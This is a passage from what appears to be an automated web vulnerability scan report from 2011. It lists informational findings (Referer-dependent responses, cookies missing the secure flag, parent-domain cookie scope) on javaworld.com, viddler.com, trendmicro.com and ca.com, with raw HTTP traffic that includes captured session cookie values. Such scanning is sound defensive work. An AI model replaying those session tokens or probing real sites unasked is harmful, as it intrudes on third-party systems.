Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:45:52 GMT
Server: Apache/2.2.3 (CentOS)
Accept-Ranges: bytes
Cache-Control: public, max-age=600
Cneonction: close
Content-Type: text/html; charset=UTF-8
Content-Length: 67949


<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/h
...[SNIP]...
<div id="login" name="login" method="post" action="/community/rtn_login08.php">
<form id="form_login">
<fieldset>
...[SNIP]...
<td>
<input name="upass" type="password" id="jq_password" class="inputtext" />
</td>
...[SNIP]...

9. Referer-dependent response

There are 3 instances of this issue:

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses are updated based on Referer data, then the same defences against malicious input should be employed here as for any other kind of user-supplied data.



9.1. http://www.javaworld.com/javaworld/jw-10-2007/jw-10-acegi2.html

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.javaworld.com
Path:   /javaworld/jw-10-2007/jw-10-acegi2.html

Request 1

GET /javaworld/jw-10-2007/jw-10-acegi2.html HTTP/1.1
Host: www.javaworld.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=acegisecurity
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:45:52 GMT
Server: Apache/2.2.3 (CentOS)
Accept-Ranges: bytes
Cache-Control: public, max-age=600
Cneonction: close
Content-Type: text/html; charset=UTF-8
Content-Length: 67949


<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/h
...[SNIP]...
<script language="javascript">
var outerref = new String("http://www.google.com/search?sourceid=chrome&amp;ie=UTF-8&amp;q=acegisecurity");
var nwchannel = 'jw';
var refresh = 0;

var jq_rxid = '115812';
</script>
<base target = "_top">

<script type="text/javascript" src="/includes/head-scripts.js"></script>
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
<script type="text/javascript">
NW = window.NW || {};

NW.PageInfo = NW.PageInfo || {};
NW.PageInfo = function() {
return{
cookie_domain: "javaworld.com",
rxprimarytopic: "enterprise",
       rxheadline: "Acegi Security in one hour",
channels: "jw",
request_uri: "/javaworld/jw-10-2007/jw-10-acegi2.html",
doc_uri: "/javaworld/jw-10-2007/jw-10-acegi2.html",
rxid: "115812",
nodeid: "",
       pgtype: "article",

// use this function to return meta info and add to NW.PageInfo object
setMetaInfo: function() {
$("meta").each(function (i) {
var n = $(this).attr("name");
var c = $(this).attr("content")
//alert('before - ' + n + ": " + c);
if(n && c) {
NW.PageInfo[n] = $(this).attr("content");
//document.write('in - ' + n + ": " + c + '<br />');
}
});
}
};
}();
NW.PageInfo.setMetaInfo();
</script>


<!-- HBX -->
<script language="javascript1.1">
var _hbEC=0,_hbE=new Array;function _hbEvent(a,b){b=_hbE[_hbEC++]=new Object();b._N=a;b._C=0;return b;}
var hbx=_hbEvent("pv");hbx.vpc="HBX0103u";hbx.gn="a.javaworld.com";
var doctitle = hbxStrip(document.title);
var loc = new String(document.location.href);
loc = hbxStrip(loc);

hbx.acct="DM54120129AB;DM550210NGWB";
hbx.pn="PUT+PAGE+NAME+HERE";
hbx.mlc="CONTENT+CATEGORY";
hbx.pndef="title";
hbx.ctdef="full";
hbx.lvm="300";
hbx.lidt="txl";

hbx.fv="";//FORM VAL MIN
hbx.lt="auto"; //LINK TR
hbx.dlf="n";//Dl FILTER
hbx.dft="n";//Dl FILE NAMING
hbx.elf="n";//E
...[SNIP]...

Request 2

GET /javaworld/jw-10-2007/jw-10-acegi2.html HTTP/1.1
Host: www.javaworld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:45:58 GMT
Server: Apache/2.2.3 (CentOS)
Accept-Ranges: bytes
Cache-Control: public, max-age=600
Cneonction: close
Content-Type: text/html; charset=UTF-8
Content-Length: 67878


<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/h
...[SNIP]...
<script language="javascript">
var outerref = new String("(none)");
var nwchannel = 'jw';
var refresh = 0;

var jq_rxid = '115812';
</script>
<base target = "_top">

<script type="text/javascript" src="/includes/head-scripts.js"></script>
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
<script type="text/javascript">
NW = window.NW || {};

NW.PageInfo = NW.PageInfo || {};
NW.PageInfo = function() {
return{
cookie_domain: "javaworld.com",
rxprimarytopic: "enterprise",
       rxheadline: "Acegi Security in one hour",
channels: "jw",
request_uri: "/javaworld/jw-10-2007/jw-10-acegi2.html",
doc_uri: "/javaworld/jw-10-2007/jw-10-acegi2.html",
rxid: "115812",
nodeid: "",
       pgtype: "article",

// use this function to return meta info and add to NW.PageInfo object
setMetaInfo: function() {
$("meta").each(function (i) {
var n = $(this).attr("name");
var c = $(this).attr("content")
//alert('before - ' + n + ": " + c);
if(n && c) {
NW.PageInfo[n] = $(this).attr("content");
//document.write('in - ' + n + ": " + c + '<br />');
}
});
}
};
}();
NW.PageInfo.setMetaInfo();
</script>


<!-- HBX -->
<script language="javascript1.1">
var _hbEC=0,_hbE=new Array;function _hbEvent(a,b){b=_hbE[_hbEC++]=new Object();b._N=a;b._C=0;return b;}
var hbx=_hbEvent("pv");hbx.vpc="HBX0103u";hbx.gn="a.javaworld.com";
var doctitle = hbxStrip(document.title);
var loc = new String(document.location.href);
loc = hbxStrip(loc);

hbx.acct="DM54120129AB;DM550210NGWB";
hbx.pn="PUT+PAGE+NAME+HERE";
hbx.mlc="CONTENT+CATEGORY";
hbx.pndef="title";
hbx.ctdef="full";
hbx.lvm="300";
hbx.lidt="txl";

hbx.fv="";//FORM VAL MIN
hbx.lt="auto"; //LINK TR
hbx.dlf="n";//Dl FILTER
hbx.dft="n";//Dl FILE NAMING
hbx.elf="n";//EXIT LINK FILTER

hbx.seg="-1";
hbx.ci="";
hbx.hc1="enterprise|";
hbx.hc
...[SNIP]...

9.2. http://www.viddler.com/embed/dca1712/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.viddler.com
Path:   /embed/dca1712/

Request 1

GET /embed/dca1712/?f=1&offset=0&autoplay=0&disablebranding=0 HTTP/1.1
Host: www.viddler.com
Proxy-Connection: keep-alive
Referer: http://blog.proofpoint.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Tue, 06 Sep 2011 20:52:08 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
X-Viddler-Node: viddler_a
Vary: Accept-Encoding
Content-Length: 3047

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>ep105 Cloud Computing and the Law</title>

<meta name="description" content="ep
...[SNIP]...
h="100%" height="100%" type="application/x-shockwave-flash" allowScriptAccess="always" allowFullScreen="true" allowNetworking="all" id="viddler_dca1712" flashVars="f=1&autoplay=f&disablebranding=f&ref=http%3A%2F%2Fblog.proofpoint.com%2F&enablejsapi=t&enablecallbacks=t&playerapiid=viddler_dca1712f=1offset=0" wmode="direct"></embed>

</div></div></body>
</html>

Request 2

GET /embed/dca1712/?f=1&offset=0&autoplay=0&disablebranding=0 HTTP/1.1
Host: www.viddler.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Tue, 06 Sep 2011 20:52:31 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
X-Viddler-Node: viddler_p
Vary: Accept-Encoding
Content-Length: 3012

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>ep105 Cloud Computing and the Law</title>

<meta name="description" content="ep
...[SNIP]...
h="100%" height="100%" type="application/x-shockwave-flash" allowScriptAccess="always" allowFullScreen="true" allowNetworking="all" id="viddler_dca1712" flashVars="f=1&autoplay=f&disablebranding=f&ref=&enablejsapi=t&enablecallbacks=t&playerapiid=viddler_dca1712f=1offset=0" wmode="direct"></embed>

</div></div></body>
</html>

9.3. http://www.viddler.com/player/dca1712/0

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.viddler.com
Path:   /player/dca1712/0

Request 1

GET /player/dca1712/0 HTTP/1.1
Host: www.viddler.com
Proxy-Connection: keep-alive
Referer: http://www.viddler.com/embed/dca1712/?f=1&offset=0&autoplay=0&disablebranding=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=DC8238792E28BE1C2E55FB125CE85F54.viddler_a

Response 1

HTTP/1.1 302 Found
Server: nginx/0.6.32
Date: Tue, 06 Sep 2011 20:52:11 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Location: http://www.viddler.com/bigPlayerChooser.action?ref=www.viddler.com&key=dca1712&offsetTime=0
Vary: Accept-Encoding
Content-Length: 355

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.viddler.com/bigPlayerChooser.action?ref=www.viddler.com&amp;key=dca1712&amp;offsetTime=0">here</a>.</p>
<hr>
<address>Apache/2.2.16 Server at www.viddler.com Port 80</address>
</body></html>

Request 2

GET /player/dca1712/0 HTTP/1.1
Host: www.viddler.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=DC8238792E28BE1C2E55FB125CE85F54.viddler_a

Response 2

HTTP/1.1 302 Found
Server: nginx/0.6.32
Date: Tue, 06 Sep 2011 20:52:38 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Location: http://www.viddler.com/bigPlayerChooser.action?ref=&key=dca1712&offsetTime=0
Vary: Accept-Encoding
Content-Length: 340

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.viddler.com/bigPlayerChooser.action?ref=&amp;key=dca1712&amp;offsetTime=0">here</a>.</p>
<hr>
<address>Apache/2.2.16 Server at www.viddler.com Port 80</address>
</body></html>

10. SSL cookie without secure flag set

There are 3 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


10.1. https://store.trendmicro.com/DRHM/Storefront/Library/scripts/DigitalRiverOTPageLevelCode.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.trendmicro.com
Path:   /DRHM/Storefront/Library/scripts/DigitalRiverOTPageLevelCode.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /DRHM/Storefront/Library/scripts/DigitalRiverOTPageLevelCode.js HTTP/1.1
Host: store.trendmicro.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://store.trendmicro.com/store?Action=DisplayPage&Locale=en_US&SiteID=tmamer&id=ShoppingCartPage
Cookie: __qca=P0-1207819931-1315351119372; bn_u=6923713920140458023; __utma=44797537.1048817980.1315351191.1315351191.1315351191.1; __utmz=44797537.1315351191.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; fsr.r={"d":90,"i":"1315351193052_377417","e":1315956018002}; __unam=e9c3bfd-132410b0872-607b674b-1; ORA_WX_SESSION=10.2.2.129:260-0#0; JSESSIONID=885803A57111A855BDA3F7D5608FCD0D; VISITOR_ID=971D4E8DFAED43672BD9EDEF2E7090049E8F29A9B6FF10E6

Response

HTTP/1.1 200 OK
Cache-Control: max-age=157788000
Expires: Thu, 02 Jun 2016 03:00:48 GMT
ETag: "80d-4891f577"
Content-Type: application/x-javascript
Last-Modified: Thu, 31 Jul 2008 17:25:11 GMT
Connection: Keep-Alive
Keep-Alive: timeout=45, max=999
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (H;max-age=7200+0;age=2440;ecid=105660496814,0)
Content-Length: 2061
Date: Thu, 02 Jun 2011 21:00:48 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app93
Accept-Ranges: bytes
Set-Cookie: BIGipServerp-drh-dc2pod9-pool1-active=1661075978.260.0000; path=/

var ptomodule={A:{},C:{},D:document,L:document.location,M:[],Q:{},T:new Date(),U:'',V:'2.7',Enabled:true,ST:"script",SA:
{"type":"text/javascript"},I:function(){var s=this.L.search;var c=this.D.cooki
...[SNIP]...

10.2. https://www.ca.com/siteminderagent/forms/login.fcc

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ca.com
Path:   /siteminderagent/forms/login.fcc

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /siteminderagent/forms/login.fcc HTTP/1.1
Host: www.ca.com
Connection: keep-alive
Referer: https://www.ca.com/us/register/login.aspx?TYPE=33554433&REALMOID=06-87393857-93f3-4215-801a-7f71d6dfdcde&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=rs-prod-communities-wa&TARGET=-SM-HTTPS%3a%2f%2fcommunities%2eca%2ecom%2fc%2fportal%2flogin%3fp_l_id%3d10141
Content-Length: 3488
Cache-Control: max-age=0
Origin: https://www.ca.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351598983:ss=1315351389192

__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJODc0ODU5MzQ3D2QWAgIBEGRkFghmD2QWDgIJDxYEHgRocmVmBSJodHRwOi8vd3d3LmNhLmNvbS91cy9wcm9kdWN0cy5hc3B4Hglpbm5lcmh0bWwFCHByb2R1Y3RzZAIKDxYEHwAFLmh0dHA6Ly
...[SNIP]...

Response

HTTP/1.1 302 Object Moved
Cache-control: no-store
Location: /register/login.aspx?TYPE=33554433&REALMOID=06-1b8e166c-7b99-4dde-8e8e-3d72b8676926&GUID=0&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-ceh3eHBrhdBGtkDbzVMc19jsrO5glB4Pb5vXNZLDdm9J8L7U83j3tj9%2bMS6GITKt&TARGET=-SM-https%3a%2f%2fwww%2eca%2ecom%2fregister%2fssoauthenticate%2easpx%3fCATARGET%3dLVNNLUhUVFBTOi8vY29tbXVuaXRpZXMuY2EuY29tL2MvcG9ydGFsL2xvZ2luP3BfbF9pZD0xMDE0MQ%3d%3d
Content-Length: 0
set-cookie: target=https%3a//www.ca.com/register/ssoauthenticate.aspx%3fCATARGET=LVNNLUhUVFBTOi8vY29tbXVuaXRpZXMuY2EuY29tL2MvcG9ydGFsL2xvZ2luP3BfbF9pZD0xMDE0MQ==; path=/; domain=.ca.com
set-cookie: SMTRYNO=1; path=/; domain=.ca.com


10.3. https://www.ca.com/us/register/login.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ca.com
Path:   /us/register/login.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /us/register/login.aspx?TYPE=33554433&REALMOID=06-87393857-93f3-4215-801a-7f71d6dfdcde&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=rs-prod-communities-wa&TARGET=-SM-HTTPS%3a%2f%2fcommunities%2eca%2ecom%2fc%2fportal%2flogin%3fp_l_id%3d10141 HTTP/1.1
Host: www.ca.com
Connection: keep-alive
Referer: http://www.ca.com/us/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351414553:ss=1315351389192; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: SMTRYNO=false; domain=ca.com; expires=Tue, 06-Sep-2011 18:23:42 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 18:23:42 GMT
Content-Length: 36056


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">
<meta htt
...[SNIP]...

11. Cookie scoped to parent domain

There are 2 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


11.1. https://www.ca.com/siteminderagent/forms/login.fcc

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ca.com
Path:   /siteminderagent/forms/login.fcc

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /siteminderagent/forms/login.fcc HTTP/1.1
Host: www.ca.com
Connection: keep-alive
Referer: https://www.ca.com/us/register/login.aspx?TYPE=33554433&REALMOID=06-87393857-93f3-4215-801a-7f71d6dfdcde&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=rs-prod-communities-wa&TARGET=-SM-HTTPS%3a%2f%2fcommunities%2eca%2ecom%2fc%2fportal%2flogin%3fp_l_id%3d10141
Content-Length: 3488
Cache-Control: max-age=0
Origin: https://www.ca.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351598983:ss=1315351389192

__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJODc0ODU5MzQ3D2QWAgIBEGRkFghmD2QWDgIJDxYEHgRocmVmBSJodHRwOi8vd3d3LmNhLmNvbS91cy9wcm9kdWN0cy5hc3B4Hglpbm5lcmh0bWwFCHByb2R1Y3RzZAIKDxYEHwAFLmh0dHA6Ly
...[SNIP]...

Response

HTTP/1.1 302 Object Moved
Cache-control: no-store
Location: /register/login.aspx?TYPE=33554433&REALMOID=06-1b8e166c-7b99-4dde-8e8e-3d72b8676926&GUID=0&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-ceh3eHBrhdBGtkDbzVMc19jsrO5glB4Pb5vXNZLDdm9J8L7U83j3tj9%2bMS6GITKt&TARGET=-SM-https%3a%2f%2fwww%2eca%2ecom%2fregister%2fssoauthenticate%2easpx%3fCATARGET%3dLVNNLUhUVFBTOi8vY29tbXVuaXRpZXMuY2EuY29tL2MvcG9ydGFsL2xvZ2luP3BfbF9pZD0xMDE0MQ%3d%3d
Content-Length: 0
set-cookie: target=https%3a//www.ca.com/register/ssoauthenticate.aspx%3fCATARGET=LVNNLUhUVFBTOi8vY29tbXVuaXRpZXMuY2EuY29tL2MvcG9ydGFsL2xvZ2luP3BfbF9pZD0xMDE0MQ==; path=/; domain=.ca.com
set-cookie: SMTRYNO=1; path=/; domain=.ca.com


11.2. https://www.ca.com/us/register/login.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ca.com
Path:   /us/register/login.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /us/register/login.aspx?TYPE=33554433&REALMOID=06-87393857-93f3-4215-801a-7f71d6dfdcde&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=rs-prod-communities-wa&TARGET=-SM-HTTPS%3a%2f%2fcommunities%2eca%2ecom%2fc%2fportal%2flogin%3fp_l_id%3d10141 HTTP/1.1
Host: www.ca.com
Connection: keep-alive
Referer: http://www.ca.com/us/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
